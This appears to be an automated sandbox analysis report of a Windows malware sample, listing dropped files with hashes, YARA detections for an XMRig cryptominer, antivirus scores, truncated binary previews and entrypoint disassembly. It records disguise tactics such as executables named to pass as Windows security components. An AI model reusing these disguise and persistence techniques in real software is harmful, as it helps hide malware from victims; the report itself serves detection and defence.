SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ak0facfv.htx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b50sjse0.c3j.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bxost4ks.t2r.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enbr45vo.puw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eokkcw0x.1hq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exunhpyj.11w.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i53talfz.btb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jj41z0da.0on.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l02lgurh.s3o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l21wsell.lcy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lr2aeiit.jii.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qlpn32jo.hax.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0yzhdmb.vsg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhawcayg.r2v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2tcvzrj.1wh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgfj2dgj.gb3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ye14jmaz.1nb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxfpbt0i.s45.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp

Download File

Process:	C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5536256
Entropy (8bit):	6.689058470432344
Encrypted:	false
SSDEEP:	98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
MD5:	8FA2F1BA9B9A7EA2B3C4DD627C627CEC
SHA1:	358E3800286E5D4C5662366AD7311BC5A51BA497
SHA-256:	78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
SHA-512:	74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................\|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Download File

Process:	C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\2688734187.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5827584
Entropy (8bit):	7.718261688436852
Encrypted:	false
SSDEEP:	98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
MD5:	13B26B2C7048A92D6A843C1302618FAD
SHA1:	89C2DFC01AC12EF2704C7669844EC69F1700C1CA
SHA-256:	1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
SHA-512:	D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

C:\Users\user\tbtnds.dat

Download File

Process:	C:\Windows\sysnldcvmr.exe
File Type:	data
Category:	dropped
Size (bytes):	4080
Entropy (8bit):	4.776282372092237
Encrypted:	false
SSDEEP:	96:V9lxpje1/XGuiCk3jc5LdxJvxLWNpvoS7Noz2xGMl/Ug4sd8n:9eWCkTc5xkJRoni4Pn
MD5:	E1C03C3B3D89CE0980AD536A43035195
SHA1:	34372B2BFE251EE880857D50C40378DC19DB57A7
SHA-256:	D2F3A053063B8BB6F66CEE3E222B610321FA4E1611FC2FAF6129C64D504D7415
SHA-512:	6EA0233DF4A093655387DAE11E935FB410E704E742DBCF085C403630E6B034671C5235AF15C21DFBB614E2A409D412A74A0B4EF7386D0ABFFFA1990D0F611C70
Malicious:	false
Reputation:	unknown
Preview:	.................TQ....Y,......f.a......8.R.......R.....q.M...._;.......py;....-........\|....../.'....m.o.....M........Y.......r......^.D8......g.....\\|.........V.....#......../.......%......6......~}....Y........L........9G......I....{......................#@......{E/....................^..8....f.P....M,.%....[]........e8.......]..............c......._.....Z......f..T....f.......Z..R......l......l\......A:..............~.....%x.........1.....e......Y.......M.w....u.......R.xJ....-.h.......cw......................pR......[W............y.V...._;.......z......_9......U.......^.Ez.....[/=....&......_.W.....]..(....R..A...._:....................................Z..{.......E.....6......\|m0.............Z..S....[z.v.....Qf............m......Z..H.......$......f.......'....Z..}....................pB......a......F5.....................{.....].V.....V>.C......,#....Z..$.....y~W....N&................r....N%.......#P.......".......=.......Z......z.............Z..e....^.,G....

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.299206637643093
Encrypted:	false
SSDEEP:	6144:IECqOEmWfd+WQF8y/9026ZTyaRsCDusBqD5dooi8lxSD6VJSRrI:tCNL6seqD5S4SWVARs
MD5:	D8E2D26C33A4640B5DB3EEBE8E3FB546
SHA1:	6A310BD578D24548B3CE2599DAA3FF47F6D1CEEA
SHA-256:	65EB19063440F2EB458026797C23BA49624D724BE5BCB1DD49BE9579E81BEBB0
SHA-512:	1B5E4945E6C7B085EC20C70A9B20234003BDD1B4E058B0E7661CB9A23CC73926D8168B200F2240FAD7F24233591FC2EB3B35FF82B48B876A8392DC86CA93BA84
Malicious:	false
Reputation:	unknown
Preview:	regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..@3G..............................................................................................................................................................................................................................................................................................................................................w..t........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\sysnldcvmr.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\896429707.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80896
Entropy (8bit):	6.424014659383267
Encrypted:	false
SSDEEP:	1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
MD5:	0C883B1D66AFCE606D9830F48D69D74B
SHA1:	FE431FE73A4749722496F19B3B3CA0B629B50131
SHA-256:	D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
SHA-512:	C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L.....3g.....................d.......u............@..........................p...............................................$.......................................................................................................................text............................... ..`.rdata...3.......4..................@..@.data...(/...@... ..................@...................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.780506037010215
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	f5TWdT5EAc.exe
File size:	476'995 bytes
MD5:	001c8845e2489435657b200199b369f8
SHA1:	1891627447cdb5bdcb50e39987084d112923a155
SHA256:	b992a18f00c902840fcd2bb93223a8cd58d0da1d9e142a90523931aa3f140276
SHA512:	cfe52ed2f55b3129326a93c724fa771f5085e55ac93f9ce9ac2bbff19f4f2c962177698aecc880ffefd07a3cc0b8ae32fc5facf430720ea490a6b3bae41ac30d
SSDEEP:	3072:/weqOYEUXPnOFWKdWuP/sB76OFftW+vX9IR3:oEUX7yQJNYEC
TLSH:	93A47024E3687817CBE398F2BD91744CD41F9F88B7C04D0E9364BB1A34E299764D19AE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L........................p.......B....c....

File Icon


Icon Hash:	31234541e14d4d49

Static PE Info

General

Entrypoint:	0x4a3c000
Entrypoint Section:	.zero
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xDEAD [Thu Jan 1 15:50:05 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	32f3282581436269b3a75b6675fe3e08

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 00000978h
call 00007F1374BDFC97h
mov dword ptr [ebp-0000023Ch], eax
cmp dword ptr [ebp-0000023Ch], 00000000h
jne 00007F1374BDEFD7h
jmp 00007F1374BDF71Eh
push 00000000h
push 00000001h
push 9B102E2Dh
mov eax, dword ptr [ebp-0000023Ch]
push eax
call 00007F1374BDFA1Eh
add esp, 10h
mov dword ptr [ebp-0000073Ch], eax
cmp dword ptr [ebp-0000073Ch], 00000000h
jne 00007F1374BDEFD7h
jmp 00007F1374BDF6F2h
mov ecx, dword ptr [ebp-0000073Ch]
push ecx
push 00000001h
push 526E0DCDh
mov edx, dword ptr [ebp-0000023Ch]
push edx
call 00007F1374BDF9EDh
add esp, 10h
mov dword ptr [ebp-000006A8h], eax
cmp dword ptr [ebp-000006A8h], 00000000h
jne 00007F1374BDEFD7h
jmp 00007F1374BDF6C1h
mov eax, dword ptr [ebp-0000073Ch]
push eax
push 00000001h
push C4B4A94Dh
mov ecx, dword ptr [ebp-0000023Ch]
push ecx
call 00007F1374BDF9BCh
add esp, 10h
mov dword ptr [ebp-0000076Ch], eax
cmp dword ptr [ebp-0000076Ch], 00000000h
jne 00007F1374BDEFD7h
jmp 00007F1374BDF690h
mov edx, 00000025h
mov word ptr [ebp-00000768h], dx
mov eax, 00000061h
mov word ptr [ebp-00000766h], ax

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b64	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x45dc000	0x5ec48	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x24655e0	0x1ae8	.ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x9b8	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
